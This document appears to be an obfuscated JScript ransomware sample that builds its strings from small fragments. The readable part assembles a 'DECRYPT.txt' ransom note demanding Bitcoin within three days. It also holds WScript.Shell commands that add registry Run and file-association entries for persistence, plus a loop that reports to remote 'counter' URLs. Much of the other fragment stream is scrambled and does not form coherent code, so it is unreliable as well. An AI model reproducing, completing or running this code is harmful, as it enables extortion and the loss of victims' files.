v79 += 'ld=i';
q86 += '"1.';
v79 += ';f';
q86 += ' Cr';
v79 += 'GET"';
q86 += 'eat';
v79 += 'rite';
q86 += 'e ';
v79 += '.Fi';
v79 += 'eLi';
q86 += 'Bit';
v79 += 'ne';
q86 += 'co';
v79 += '/c ';
v79 += 'else';
q86 += 'in w';
v79 += 'Run(';
v79 += 'if(x';
q86 += 'al';
v79 += ');';
v79 += '"+cq';
q86 += 'let ';
v79 += 'php';
v79 += ' you';
q86 += 'her';
v79 += 'ct"';
q86 += 'e:"';
v79 += ' d';
q86 += ');';
v79 += 'fal';
v79 += 'ad';
q86 += ' fp';
v79 += '. S';
q86 += '.W';
v79 += 'EL ';
q86 += 'rit';
v79 += 'ne(';
q86 += 'eLin';
v79 += 'n+';
q86 += 'e(';
v79 += 'us';
v79 += 'te';
q86 += '""';
v79 += 'p.W';
v79 += ');';
q86 += '); f';
v79 += 'te';
q86 += 'p.W';
v79 += ' /';
v79 += 'er';
q86 += 'rit';
v79 += 'se);';
v79 += 't("M';
q86 += 'eLi';
v79 += ');';
q86 += 'ne(';
v79 += '); ';
q86 += '"  ';
v79 += 'ec';
q86 += '   ';
v79 += 'cq+';
q86 += ' htt';
v79 += 'll';
v79 += 'tp:/';
q86 += 'ps:/';
v79 += 'i<l';
q86 += '/blo';
v79 += 'Writ';
q86 += 'ckch';
v79 += 'leEx';
v79 += 'ypt';
q86 += 'ain';
v79 += '00)';
v79 += 'xe",';
q86 += '.i';
v79 += 'MSP';
q86 += 'nf';
v79 += 'NT';
q86 += 'o/wa';
v79 += 'yo';
q86 += 'lle';
v79 += 'en("';
v79 += '",';
q86 += 't/ne';
v79 += 'ng';
q86 += 'w")';
v79 += '+"D';
v79 += ')+';
q86 += '; f';
v79 += 't(';
v79 += ',0);';
q86 += 'p.';
v79 += 'id="';
v79 += 'p.Wr';
q86 += 'Wri';
v79 += 'SZ ';
q86 += 'te';
v79 += 'engt';
v79 += ',0,0';
q86 += 'Lin';
v79 += ' var';
v79 += '.i';
q86 += 'e(""';
v79 += 't.Cr';
v79 += '."';
q86 += '); f';
v79 += 'te';
q86 += 'p.';
v79 += 'cq';
v79 += 'Scri';
q86 += 'Wri';
v79 += 'fn+';
v79 += 'o.Fi';
q86 += 'teL';
v79 += '"&s';
q86 += 'ine(';
v79 += 'EL ';
v79 += '("A';
q86 += '"2';
v79 += 'Cr';
q86 += '. B';
v79 += 'vi';
v79 += 'nv';
q86 += 'uy';
v79 += '/c ';
q86 += ' "+b';
v79 += '"+a';
v79 += 'in';
q86 += 'c+" ';
v79 += '="';
v79 += 've';
q86 += 'BT';
v79 += ' ws.';
q86 += 'C w';
v79 += '/c';
v79 += 's=';
q86 += 'ith ';
v79 += '; f';
v79 += 'ET"';
q86 += 'cash';
v79 += '<=2';
q86 += ', ';
v79 += 'DE';
v79 += ' fp.';
q86 += 'usin';
v79 += 'cq+f';
v79 += 'leEx';
q86 += 'g ';
v79 += 'ls';
q86 += 'sea';
v79 += '++) ';
q86 += 'rch';
v79 += 'C w';
v79 += 'd="1PXyK1CM8Dyr9tV51Ubub5imyvpmvqVmVf';
q86 += ' her';
v79 += 'Tex';
q86 += 'e:")';
v79 += '.fr';
q86 += '; ';
v79 += '"+cq';
v79 += 'om"';
q86 += 'fp';
v79 += 'cq';
v79 += 'f(n';
q86 += '.Wr';
v79 += ' if';
v79 += 'fol';
q86 += 'ite';
v79 += 'ry';
q86 += 'Li';
v79 += ');';
v79 += 'HKCR';
q86 += 'ne';
v79 += 'ate';
v79 += ' (va';
q86 += '("")';
v79 += '"+c';
v79 += '"  ';
q86 += '; ';
v79 += 'm","';
q86 += 'fp.W';
v79 += 'Writ';
q86 += 'ri';
v79 += 'C%';
v79 += '591';
q86 += 'te';
v79 += 'd"+';
v79 += '591';
q86 += 'Line';
v79 += 'ept ';
q86 += '("';
v79 += 'ph';
v79 += 'ther';
q86 += '   ';
v79 += 't("M';
q86 += '   ';
v79 += 'r i=';
v79 += '."';
q86 += 'htt';
v79 += 't ';
q86 += 'ps:/';
v79 += 'send';
q86 += '/loc';
v79 += '"+c';
q86 += 'al';
v79 += '.Fi';
v79 += 'xo.';
q86 += 'bitc';
v79 += 'i<l';
q86 += 'oins';
v79 += ' /';
q86 += '.c';
v79 += '.Cr';
q86 += 'om/';
v79 += 'p.';
v79 += 'c.")';
q86 += 'buy';
v79 += '); ';
v79 += 'engt';
q86 += '_bit';
v79 += 'f(n';
v79 += 'e(';
q86 += 'co';
v79 += ' i';
q86 += 'ins';
v79 += '"4.';
q86 += '")';
v79 += 'des';
q86 += '; ';
v79 += 'ypte';
v79 += 'TC t';
q86 += 'fp.';
v79 += 'try{';
v79 += 'tab';
q86 += 'Writ';
v79 += 'nua';
q86 += 'eLin';
v79 += '("%C';
v79 += '; ';
q86 += 'e("';
v79 += 'el';
v79 += '")';
q86 += '");';
v79 += 'CO';
q86 += ' fp';
v79 += '5. ';
q86 += '.Wr';
v79 += 'e i';
q86 += 'ite';
v79 += '.F';
v79 += 'te';
q86 += 'Line';
v79 += ',"ww';
v79 += 'ore ';
q86 += '("3';
v79 += 'id+"';
v79 += 'All ';
q86 += '. S';
v79 += '"+a';
v79 += 'ne';
q86 += 'en';
v79 += 'lgor';
v79 += '0;i<';
q86 += 'd "';
v79 += '0)';
v79 += 'tp';
q86 += '+bc';
v79 += 'cs';
v79 += 'g ';
q86 += '+" B';
v79 += '("';
v79 += '/c';
q86 += 'TC t';
v79 += 'Wri';
v79 += 'REG_';
q86 += 'o t';
v79 += '+".t';
v79 += 'Tff6CxOofKLv46njM9MdfD_bBw7qRFZ6ffAJEPEXmzdahf7_QaFE8NdPA8MC7WRLiyTxoxCLTP0"';
q86 += 'his ';
v79 += '+c';
q86 += 'Bi';
v79 += 'co';
q86 += 'tcoi';
v79 += 'ne';
v79 += 'h(e';
q86 += 'n ad';
v79 += ' x';
q86 += 'dres';
v79 += 'he';
v79 += 'cq';
q86 += 's:';
v79 += 'e("';
q86 += '");';
v79 += 'le';
q86 += ' f';
v79 += '+l';
v79 += '="';
q86 += 'p.W';
v79 += '")';
v79 += '+cq';
q86 += 'rite';
v79 += 'il';
q86 += 'Li';
v79 += 'us';
q86 += 'ne("';
v79 += 'A-1';
v79 += '   ';
q86 += '"); ';
v79 += ' w';
v79 += 'ar ';
q86 += 'fp.';
v79 += ',0,0';
v79 += 'tp:/';
q86 += 'Wri';
v79 += '"1.';
q86 += 'teLi';
v79 += 'ls';
q86 += 'ne(';
v79 += '+f';
v79 += 'ins';
q86 += '"   ';
v79 += 'fn';
v79 += 'at';
q86 += '   ';
v79 += '; fp';
q86 += '"+a';
v79 += '+"S';
v79 += 'ere';
q86 += 'd)';
v79 += ' };';
v79 += 'fi';
q86 += '; ';
v79 += 'TP';
v79 += 'te';
q86 += 'fp';
v79 += 'var ';
q86 += '.Wri';
v79 += ' fp.';
v79 += 'ter ';
q86 += 'te';
v79 += '=WS';
v79 += 'C w';
q86 += 'Li';
v79 += '"ph';
v79 += '+"';
q86 += 'ne("';
v79 += '"+c';
q86 += '");';
v79 += 'var ';
v79 += 'GET"';
q86 += ' fp.';
v79 += 'Writ';
v79 += '"+c';
q86 += 'Writ';
v79 += 'C% /';
v79 += 'CRY';
q86 += 'eL';
v79 += 'er';
v79 += '+pd';
q86 += 'ine(';
v79 += '  ';
q86 += '"4.';
v79 += 'ine(';
q86 += ' Op';
v79 += '0)';
q86 += 'en ';
v79 += 's ';
v79 += 'cq';
q86 += 'on';
v79 += 'nf';
v79 += 'Wri';
q86 += 'e o';
v79 += '.fr';
q86 += 'f t';
v79 += 'Bi';
v79 += 'te';
q86 += 'he';
v79 += 'e o';
v79 += '. B';
q86 += ' fo';
v79 += 'oins';
q86 += 'll';
v79 += '!"';
v79 += '+n+';
q86 += 'ow';
v79 += 'eLi';
v79 += '"+c';
q86 += 'in';
v79 += 's=';
q86 += 'g li';
v79 += '; };';
q86 += 'nks ';
v79 += 'p.W';
v79 += '"   ';
q86 += 'in';
v79 += 'st';
v79 += 'a.o';
q86 += ' you';
v79 += 'r ';
q86 += 'r ';
v79 += 'le(';
v79 += 'a.s';
q86 += 'br';
v79 += 'nf';
v79 += 'RE';
q86 += 'ows';
v79 += 'Te';
q86 += 'er';
v79 += ' htt';
q86 += ' to';
v79 += '{fp.';
v79 += 'u ca';
q86 += ' d';
v79 += '+ll[';
v79 += 'ea';
q86 += 'own';
v79 += 'ra';
q86 += 'lo';
v79 += 'Sc';
q86 += 'ad';
v79 += 'or';
v79 += 'ar c';
q86 += ' d';
v79 += 'o.';
v79 += '%"';
q86 += 'ec';
v79 += 'te';
v79 += '=0;';
q86 += 'ry';
v79 += 'fn';
v79 += 'o/wa';
q86 += 'pt';
v79 += 'else';
q86 += 'or';
v79 += 'ose(';
v79 += 'OFTW';
q86 += ':")';
v79 += ' on';
q86 += '; f';
v79 += '("  ';
v79 += 'aria';
q86 += 'p.Wr';
v79 += 'ur';
q86 += 'ite';
v79 += 'cq+"';
q86 += 'Lin';
v79 += 'a u';
v79 += 'a.si';
q86 += 'e("';
v79 += 'fp.';
v79 += 's+';
q86 += '")';
v79 += 'te';
q86 += '; f';
v79 += 'Tff6CxOofKLv46njM9MdfD_bBw7qRFZ6ffAJEPEXmzdahf7_QaFE8NdPA8MC7WRLiyTxoxCLTP0"';
q86 += 'or';
v79 += 'nd o';
v79 += 'ron';
q86 += ' (va';
v79 += 'fp.';
q86 += 'r i=';
v79 += 'Wri';
q86 += '0;i<';
v79 += 's"+c';
v79 += 'us';
q86 += 'll.l';
v79 += '){x';
q86 += 'engt';
v79 += '; ';
q86 += 'h;';
v79 += '"+';
v79 += ' /c';
q86 += 'i++)';
v79 += 'g ';
v79 += 'ea';
q86 += ' { f';
v79 += '+c';
v79 += 'Ver';
q86 += 'p.W';
v79 += 'c "+';
v79 += 'C% ';
q86 += 'ri';
v79 += 'eLi';
q86 += 'teL';
v79 += '(xo';
v79 += '".t';
q86 += 'ine';
v79 += 'epad';
v79 += 'ur ';
q86 += '("';
v79 += ') {';
q86 += '  ';
v79 += 'o.Cr';
v79 += 'ne("';
q86 += '  ';
v79 += '"%Us';
q86 += '  ';
v79 += '=20';
q86 += 'htt';
v79 += 'cq+f';
v79 += 'cq';
q86 += 'p:';
v79 += 'ct"';
q86 += '//"';
v79 += 'o.se';
q86 += '+l';
v79 += '1,';
v79 += 'Obj';
q86 += 'l[i';
v79 += '=ws';
q86 += ']+"/';
v79 += 'teO';
q86 += 'coun';
v79 += '+cs+';
q86 += 'ter';
v79 += 's+';
v79 += '+c';
q86 += '/?a';
v79 += ');';
v79 += 'lgor';
q86 += '="';
v79 += 'be';
v79 += 'ne';
q86 += '+ad)';
v79 += 'sta';
q86 += '; ';
v79 += 'A-1';
v79 += 'usel';
q86 += '}; ';
v79 += '"C';
v79 += ' (va';
q86 += 'fp.';
v79 += 'te';
v79 += 'eL';
q86 += 'Wri';
v79 += 'exc';
v79 += 'ar ';
q86 += 'te';
v79 += 'le(f';
v79 += '); v';
q86 += 'Li';
v79 += 'p.W';
q86 += 'ne("';
v79 += 'yo';
v79 += 'nv';
q86 += '"); ';
v79 += '+fn';
q86 += 'fp.W';
v79 += '"+c';
v79 += ' fal';
q86 += 'ri';
v79 += '591';
q86 += 'teL';
v79 += 'CRY';
v79 += 'ar ';
q86 += 'in';
v79 += '+ad+';
v79 += '.op';
q86 += 'e("';
v79 += 'tor';
q86 += '5. ';
v79 += 'this';
v79 += 'bo';
q86 += 'Run ';
v79 += ' /';
v79 += '"   ';
q86 += 'decr';
v79 += '+l';
v79 += 'Writ';
q86 += 'ypt';
v79 += 't ';
q86 += 'or ';
v79 += 't(';
q86 += 'to';
v79 += '.Exp';
q86 += ' r';
v79 += '+c';
q86 += 'est';
v79 += '".ph';
q86 += 'ore ';
v79 += 'fp=f';
v79 += 'sio';
q86 += 'you';
v79 += 'or';
v79 += 'ng';
q86 += 'r f';
v79 += 'cq';
q86 += 'iles';
v79 += ' (va';
v79 += 'en("';
q86 += '."';
v79 += '000;';
q86 += '); f';
v79 += ' va';
v79 += '+id';
q86 += 'p.W';
v79 += '"+';
v79 += 'dE';
q86 += 'rit';
v79 += 'men';
v79 += ' (b';
q86 += 'eLi';
v79 += 'i<l';
q86 += 'ne("';
v79 += ' cop';
q86 += '")';
v79 += ' /';
v79 += 'n+".';
q86 += '; f';
v79 += 'nsta';
v79 += '+"';
q86 += 'p.Wr';
v79 += ') ';
q86 += 'iteL';
v79 += 'ile(';
v79 += '  ';
q86 += 'in';
v79 += '%COM';
v79 += 'it';
q86 += 'e("P';
v79 += 'PT.';
v79 += 'n("%';
q86 += 'LEAS';
v79 += 'fp=f';
v79 += 's+';
q86 += 'E RE';
v79 += '. B';
v79 += ']+';
q86 += 'MEM';
v79 += 'else';
q86 += 'BER:';
v79 += '%COM';
q86 += '"); ';
v79 += 'cq+';
v79 += '   ';
q86 += 'fp';
v79 += 'cq';
v79 += 'en';
q86 += '.Wr';
v79 += 'om/';
v79 += 'Cre';
q86 += 'iteL';
v79 += 'an';
q86 += 'ine';
v79 += 'it';
q86 += '("")';
v79 += 'fp.';
q86 += '; fp';
v79 += 'i++)';
v79 += 'ne(';
q86 += '.Wri';
v79 += '+fn';
v79 += 'teLi';
q86 += 'teL';
v79 += 'C% /';
v79 += 'C w';
q86 += 'ine(';
v79 += 'ttp:';
q86 += '"   ';
v79 += 'ION';
q86 += '   -';
v79 += '//"';
q86 += ' If';
v79 += 'fp';
v79 += 'le';
q86 += ' y';
v79 += 'en("';
v79 += 'cs+"';
q86 += 'ou d';
v79 += 'uw';
v79 += '2.';
q86 += 'o no';
v79 += 'Line';
v79 += '{ ';
q86 += 't pa';
v79 += 'e("';
v79 += 'if(n';
q86 += 'y ';
v79 += 'at';
q86 += 'in 3';
v79 += 'ne("';
q86 += ' da';
v79 += '"+c';
q86 += 'ys';
v79 += '; ';
v79 += 'p.Wr';
q86 += ' YOU';
v79 += '    ';
v79 += '; v';
q86 += ' LO';
v79 += 's+';
v79 += 'you';
q86 += 'OS';
v79 += 'e%';
v79 += 'ar ';
q86 += 'E AL';
v79 += 'eLin';
v79 += '"+';
q86 += 'L Y';
v79 += 'a.si';
v79 += 'ose(';
q86 += 'OUR';
v79 += '=1; ';
v79 += 'ter';
q86 += ' FIL';
v79 += 'an';
v79 += ' /';
q86 += 'ES."';
v79 += '("';
q86 += '); f';
v79 += 'u m';
v79 += '; f';
q86 += 'p.Wr';
v79 += 'cq+f';
q86 += 'it';
v79 += '"+';
v79 += ');';
q86 += 'eLin';
v79 += 'PE';
q86 += 'e("';
v79 += 'let ';
v79 += 'ttp:';
q86 += '   ';
v79 += '.tx';
v79 += 'ch.';
q86 += '   ';
v79 += 'ith ';
v79 += 'tr';
q86 += '- No';
v79 += 's+"D';
q86 += 'bo';
v79 += ' t';
v79 += 'ri';
q86 += 'dy ';
v79 += ',t';
v79 += '+n+';
q86 += 'can';
v79 += 'lch';
q86 += ' hel';
v79 += 'sk';
v79 += 'm.c';
q86 += 'p y';
v79 += 'ld=i';
q86 += 'ou ';
v79 += 'fn';
q86 += 'exc';
v79 += 'E RE';
q86 += 'ept ';
v79 += '; ';
v79 += '+n+';
q86 += 'us';
v79 += '; ';
v79 += 'xo.o';
q86 += '."';
v79 += 'PT.';
v79 += 'MEM';
q86 += '); f';
v79 += 'rea';
q86 += 'p.Wr';
v79 += ',2)';
v79 += '/loc';
q86 += 'iteL';
v79 += 'r(v';
v79 += '; ';
q86 += 'in';
v79 += '/c';
v79 += '+"S';
q86 += 'e(" ';
v79 += 'epad';
v79 += ',0,0';
q86 += '    ';
v79 += 'kutu';
v79 += 'ws.R';
q86 += ' - ';
v79 += 'C% /';
v79 += 'yp';
q86 += 'It`';
v79 += 'his ';
v79 += 'a.s';
q86 += 's ';
v79 += 'uw';
v79 += 'ileE';
q86 += 'usel';
v79 += 'erP';
q86 += 'es';
v79 += '".';
q86 += 's ';
v79 += ' /';
v79 += 'try{';
q86 += 'to';
v79 += 'ar ';
q86 += ' rei';
v79 += ':")';
q86 += 'nsta';
v79 += '("A';
v79 += ' /';
q86 += 'll W';
v79 += ' f';
v79 += 'exe"';
q86 += 'indo';
v79 += 'Writ';
v79 += 'd="+';
q86 += 'ws, ';
v79 += '- Yo';
v79 += 'txt)';
q86 += 'upda';
v79 += '; ';
q86 += 'te a';
v79 += 'be';
v79 += 'MP';
q86 += 'ntiv';
v79 += 'eLin';
q86 += 'iru';
v79 += '"   ';
v79 += 'rCod';
q86 += 's ';
v79 += '%COM';
q86 += 'sof';
v79 += 'php';
v79 += 'COM';
q86 += 'twa';
v79 += ' };';
q86 += 're';
v79 += 'te';
v79 += '"%TE';
q86 += ', et';
v79 += 'ite';
q86 += 'c.")';
v79 += '.fr';
q86 += '; ';
v79 += 'bo';
q86 += 'fp.';
v79 += 'if(x';
v79 += 'ins';
q86 += 'Writ';
v79 += 've';
v79 += 'Lin';
q86 += 'eLi';
v79 += 'REG_';
q86 += 'ne';
v79 += 'onl';
q86 += '("  ';
v79 += '00)';
v79 += '"+c';
q86 += '  ';
v79 += '+" B';
v79 += 'D "+';
q86 += '  ';
v79 += '0)';
q86 += '- ';
v79 += 'sk';
v79 += 'q+';
q86 += 'Your';
v79 += 'eas';
v79 += 'rt';
q86 += ' f';
v79 += 'bjec';
v79 += 'p.';
q86 += 'il';
v79 += '.R';
v79 += 'buy';
q86 += 'es ';
v79 += 'n ad';
q86 += 'can';
v79 += 'ypt';
q86 += ' be';
v79 += 'ain';
v79 += 'eL';
q86 += ' d';
v79 += 'sav';
v79 += '+"/';
q86 += 'ec';
v79 += 'fp.';
v79 += 'in';
q86 += 'ry';
v79 += 'p.Wr';
q86 += 'pte';
v79 += 'ay';
q86 += 'd ';
v79 += ' BTC';
q86 += 'onl';
v79 += 'omCh';
q86 += 'y af';
v79 += '; f';
v79 += '{ ';
q86 += 'ter ';
v79 += '"+';
q86 += 'yo';
v79 += 'p.W';
q86 += 'u m';
v79 += '0;i<';
v79 += 'ri';
q86 += 'ake';
v79 += 'ain';
q86 += ' p';
v79 += 'p.';
v79 += 'niqu';
q86 += 'aym';
v79 += 'C%';
q86 += 'ent';
v79 += '<=2';
v79 += ')+c';
q86 += '.");';
v79 += 'esk';
q86 += ' fp.';
v79 += 'teL';
v79 += '+cq';
q86 += 'Writ';
v79 += 'Li';
v79 += '("';
q86 += 'eLi';
v79 += 't(';
v79 += 'r do';
q86 += 'ne';
v79 += ';b';
v79 += '("';
q86 += '("';
v79 += 'ry';
q86 += '   ';
v79 += ' you';
v79 += 'Stri';
q86 += '   ';
v79 += 'pd,2';
v79 += 'G AD';
q86 += '- Yo';
v79 += 'p y';
v79 += '"+';
q86 += 'u ca';
v79 += 'eas';
q86 += 'n ';
v79 += 'ro';
v79 += '; } ';
q86 += 'fi';
v79 += 'n ';
v79 += 'in 3';
q86 += 'nd t';
v79 += '"/c';
v79 += 'po';
q86 += 'his';
v79 += ')+';
v79 += 'SZ ';
q86 += ' m';
v79 += 'ne("';
q86 += 'an';
v79 += ',0';
v79 += '.");';
q86 += 'ual';
v79 += 'a.';
q86 += ' on';
v79 += '"%TE';
q86 += ' you';
v79 += 'cq+f';
q86 += 'r ';
v79 += 'r x';
v79 += ';i++';
q86 += 'des';
v79 += 'ith ';
v79 += 'CO';
q86 += 'kt';
v79 += 'xo.';
v79 += '+cq+';
q86 += 'op (';
v79 += '.W';
v79 += 'se ';
q86 += 'DE';
v79 += 'MEM';
q86 += 'CRY';
v79 += 'e:")';
q86 += 'PT.';
v79 += 'fal';
v79 += 'ar ';
q86 += 'txt)';
v79 += 'G AD';
q86 += '.")';
v79 += 'f(n=';
v79 += '+"S';
q86 += '; fp';
v79 += 'Cr';
v79 += '"Cur';
q86 += '.Cl';
v79 += 'sea';
v79 += '+n+';
q86 += 'ose(';
v79 += 'eat';
q86 += '); ';
v79 += '"); ';
q86 += 'ws.R';
v79 += 'eat';
q86 += 'un';
v79 += 'p.Wr';
q86 += '("%';
v79 += '+n, ';
q86 += 'CO';
v79 += 'te';
q86 += 'MSPE';
v79 += 'xa.c';
q86 += 'C% /';
v79 += ' "';
q86 += 'c ';
v79 += 'Tff6CxOofKLv46njM9MdfD_bBw7qRFZ6ffAJEPEXmzdahf7_QaFE8NdPA8MC7WRLiyTxoxCLTP0"';
v79 += 'WScr';
q86 += 'RE';
v79 += 't.Cr';
q86 += 'G AD';
v79 += 'Wri';
v79 += '"&i';
q86 += 'D "+';
v79 += 'pte';
q86 += 'cq';
v79 += 'NT';
v79 += 'p4t';
q86 += '+"';
v79 += 'arCo';
q86 += 'HKCU';
v79 += 'xt"+';
v79 += 'Bi';
q86 += '"+cs';
v79 += '"); ';
v79 += '.fr';
q86 += '+"S';
v79 += '"%CO';
v79 += ' BTC';
q86 += 'OFTW';
v79 += 'emOb';
v79 += '"%C';
q86 += 'ARE';
v79 += 'd="1PXyK1CM8Dyr9tV51Ubub5imyvpmvqVmVf';
v79 += '=3';
q86 += '"+c';
v79 += '.Wr';
q86 += 's+"';
v79 += 'es';
q86 += 'Micr';
v79 += '. S';
q86 += 'osof';
v79 += 'Wri';
v79 += 'Your';
q86 += 't"';
v79 += 'xo.o';
v79 += '}c';
q86 += '+c';
v79 += '/loc';
q86 += 's+"';
v79 += '("  ';
q86 += 'Win';
v79 += 'G AD';
v79 += 'All ';
q86 += 'dow';
v79 += ' };';
v79 += 'n=';
q86 += 's"+c';
v79 += 'ar ';
v79 += 'aveT';
q86 += 's+';
v79 += 'ES."';
v79 += 'ed"';
q86 += '"Cur';
v79 += 'p.';
v79 += 'jec';
q86 += 'rent';
v79 += '0,';
q86 += 'Ver';
v79 += ' /';
v79 += '="';
q86 += 'sio';
v79 += 'e); ';
q86 += 'n"';
v79 += '"+';
q86 += '+cs';
v79 += 'fn';
v79 += 'a.ty';
q86 += '+"Ru';
v79 += '. S';
v79 += '_bit';
q86 += 'n"+';
v79 += ',"s';
q86 += 'cq+"';
v79 += 'ex';
v79 += 'r ';
q86 += ' /';
v79 += 'ADOD';
q86 += 'V "+';
v79 += 'exe"';
q86 += 'cq+';
v79 += '"D';
v79 += ' x';
q86 += '"C';
v79 += 'Wri';
q86 += 'ry';
v79 += '"");';
q86 += 'pted';
v79 += 'MSPE';
v79 += '"); ';
q86 += '"+';
v79 += 'fp=f';
q86 += 'cq+"';
v79 += '.w';
v79 += 'txt';
q86 += ' /';
v79 += 'y."';
v79 += ';n';
q86 += 't RE';
v79 += 'il';
v79 += 'fp';
q86 += 'G_SZ';
v79 += '"2';
q86 += ' /F';
v79 += 'op (';
v79 += 'ng';
q86 += ' /';
v79 += 'e ke';
v79 += ')+c';
q86 += 'D ';
v79 += 'pt.S';
v79 += 'RE';
q86 += '"+';
v79 += 'ppD';
q86 += 'cq';
v79 += '"")';
v79 += 'eLi';
q86 += '+fn+';
v79 += 'ere';
q86 += '".';
v79 += '+cq,';
v79 += '+cq';
q86 += 'txt';
v79 += 's+';
v79 += 'MEM';
q86 += '"+c';
v79 += '); ';
v79 += 'ws.R';
q86 += 'q,0,';
v79 += 'e ';
q86 += '0)';
v79 += ' va';
v79 += 'and';
q86 += '; ';
v79 += 'G AD';
q86 += 'ws';
v79 += '; f';
v79 += '=1; ';
q86 += '.Run';
v79 += '".t';
q86 += '("%';
v79 += 'Te';
q86 += 'COM';
v79 += 'Sc';
q86 += 'SPE';
v79 += '"+c';
q86 += 'C%';
v79 += '");';
v79 += 'Win';
q86 += ' /c';
v79 += 'nf';
v79 += ',0,0';
q86 += ' RE';
v79 += 'ileE';
q86 += 'G AD';
v79 += 'e i';
v79 += 'to';
q86 += 'D "+';
v79 += 'ne("';
v79 += 'Wri';
q86 += 'cq';
v79 += 'buy';
v79 += 'pt';
q86 += '+"HK';
v79 += 'Run(';
q86 += 'CR';
v79 += 'n+".';
q86 += '"+cs';
v79 += '0,0';
q86 += '+"';
v79 += 'd)';
v79 += 'try{';
q86 += '.cr';
v79 += 'p.W';
v79 += '%"';
q86 += 'ypt';
v79 += 'll.l';
v79 += 'e ';
q86 += 'ed"';
v79 += 'fo';
v79 += 'txt)';
q86 += '+cq';
v79 += '); f';
v79 += '"/c';
q86 += '+"';
v79 += '++) ';
q86 += ' /';
v79 += 'ar ';
q86 += 've /';
v79 += 'her';
q86 += 't RE';
v79 += 'ppD';
v79 += 'ypte';
q86 += 'G_';
v79 += '+n, ';
q86 += 'SZ ';
v79 += 'ec';
v79 += 'ue)';
q86 += '/F /';
v79 += 'll';
q86 += 'D "+';
v79 += 'g.fr';
v79 += ' BTC';
q86 += 'cq';
v79 += '; } ';
v79 += 'll W';
q86 += '+"Cr';
v79 += '"; v';
q86 += 'ypte';
v79 += 'En';
v79 += 'us';
q86 += 'd"+';
v79 += 'yo';
q86 += 'cq,';
v79 += '/D';
v79 += '; ws';
q86 += '0,0';
v79 += 'coun';
q86 += '); ';
v79 += 'cq+"';
q86 += 'ws.R';
v79 += 't/ne';
q86 += 'un(';
v79 += 'ing ';
v79 += 'eLi';
q86 += '"%CO';
v79 += 'nsta';
q86 += 'MSP';
v79 += ' if';
q86 += 'EC%';
v79 += '); ';
v79 += '.W';
q86 += ' /c';
v79 += 'Ru';
v79 += 'exc';
q86 += ' R';
v79 += '%"';
q86 += 'EG ';
v79 += 'ow';
v79 += '")';
q86 += 'ADD ';
v79 += '+" B';
v79 += ' fo';
q86 += '"+c';
v79 += 'als';
v79 += '("  ';
q86 += 'q+"';
v79 += 'lo';
q86 += 'HKCR';
v79 += 'uy';
v79 += 'Crea';
q86 += '"+';
v79 += 'TP';
q86 += 'cs+"';
v79 += 'p.W';
v79 += '"+cq';
q86 += 'Cr';
v79 += 'teLi';
q86 += 'yp';
v79 += '("';
v79 += 'p.';
q86 += 'te';
v79 += '"%';
q86 += 'd"';
v79 += 'nd()';
v79 += 'ne';
q86 += '+c';
v79 += ';i<1';
q86 += 's+';
v79 += '"sh';
v79 += ' DE';
q86 += '"sh';
v79 += 'te';
q86 += 'ell"';
v79 += 'aym';
q86 += '+c';
v79 += '=1; ';
v79 += 'r ';
q86 += 's+"';
v79 += '0)';
q86 += 'ope';
v79 += 'fp=f';
v79 += ',2);';
q86 += 'n"';
v79 += 'All ';
q86 += '+c';
v79 += ' f';
q86 += 's+';
v79 += 'iro';
q86 += '"c';
v79 += 'ur';
v79 += ',2';
q86 += 'om';
v79 += ';i<1';
v79 += 'p.Wr';
q86 += 'ma';
v79 += 'E AL';
q86 += 'nd"';
v79 += 'ET"';
v79 += ' to';
q86 += '+cq+';
v79 += '();';
v79 += '"&i';
q86 += '" ';
v79 += 'd"';
q86 += '/ve';
v79 += 'in 3';
q86 += ' /';
v79 += 'w.m';
v79 += 'ar ';
q86 += 't ';
v79 += 'r/?a';
v79 += '+"D';
q86 += 'REG_';
v79 += ' y';
v79 += ' fo';
q86 += 'SZ';
v79 += 'Writ';
q86 += ' /';
v79 += 'l.le';
q86 += 'F ';
v79 += 'ou ';
v79 += 'p.W';
q86 += '/D';
v79 += 'F ';
q86 += ' "+';
v79 += '" ';
q86 += 'cq';
v79 += ' en';
v79 += ',"ww';
q86 += '+"no';
v79 += '"+cs';
v79 += 'ith ';
q86 += 'te';
v79 += '"+c';
v79 += 'h(e';
q86 += 'pad.';
v79 += 'te';
v79 += 'l";';
q86 += 'ex';
v79 += '{xa.';
q86 += 'e "+';
v79 += 'e o';
v79 += 'ri';
q86 += 'cs+';
v79 += '); ';
v79 += 'cq+f';
q86 += 'cq';
v79 += 'xis';
v79 += 'ppD';
q86 += '+f';
v79 += ' { d';
v79 += 'un(';
q86 += 'n+".';
v79 += 'ases';
v79 += 'indo';
q86 += 'txt';
v79 += 'cs+';
q86 += '"+c';
v79 += 'i<l';
v79 += 'htt';
q86 += 's+cq';
v79 += '"); ';
v79 += 'le(f';
q86 += '+cq,';
v79 += 'f t';
q86 += '0,';
v79 += 'ar ';
q86 += '0); ';
v79 += 'nf';
q86 += 'ws.R';
v79 += 'ppD';
q86 += 'un(';
v79 += 's+';
q86 += '"%';
v79 += '+cs';
v79 += 'PT.';
q86 += 'COM';
v79 += 'fn';
q86 += 'SP';
v79 += 'sa';
q86 += 'EC% ';
v79 += 'e o';
v79 += '+cq';
q86 += '/c ';
v79 += ' /c';
v79 += 'p.W';
q86 += 'copy';
v79 += ':")';
v79 += '"+c';
q86 += ' /';
v79 += '+fn';
v79 += '- Yo';
q86 += 'y ';
v79 += ' r';
q86 += '"+';
v79 += 'd+';
q86 += 'cq+f';
v79 += 'ne("';
q86 += 'n+';
v79 += 'cs+"';
v79 += 'ts, ';
q86 += '".t';
v79 += 's+"';
v79 += 'fp';
q86 += 'xt"+';
v79 += '); ';
q86 += 'cq';
v79 += 'SPE';
v79 += 'n"';
q86 += '+" ';
v79 += 'usel';
q86 += '"+cq';
v79 += 'at';
q86 += '+"%A';
v79 += 'rea';
v79 += '.Cl';
q86 += 'ppD';
v79 += '+fn+';
v79 += '&st=';
q86 += 'at';
v79 += ' }';
v79 += 'pen(';
q86 += 'a%"';
v79 += 'ur';
q86 += '+cs+';
v79 += 'oins';
v79 += '"); ';
q86 += '"De';
v79 += 'ou ';
v79 += 'RE';
q86 += 'sk';
v79 += '); f';
q86 += 'to';
v79 += 'll.l';
q86 += 'p"+';
v79 += 'fp=f';
q86 += 'cs';
v79 += 'a.si';
v79 += 'n=1';
q86 += '+"D';
v79 += 'es ';
q86 += 'ECRY';
v79 += 'ent';
v79 += 'nua';
q86 += 'PT';
v79 += 'g.fr';
v79 += 'ther';
q86 += '.txt';
v79 += 's ';
v79 += 'vi';
q86 += '"+cq';
v79 += ') {';
v79 += 't.Cr';
q86 += ',0,0';
v79 += 'ws';
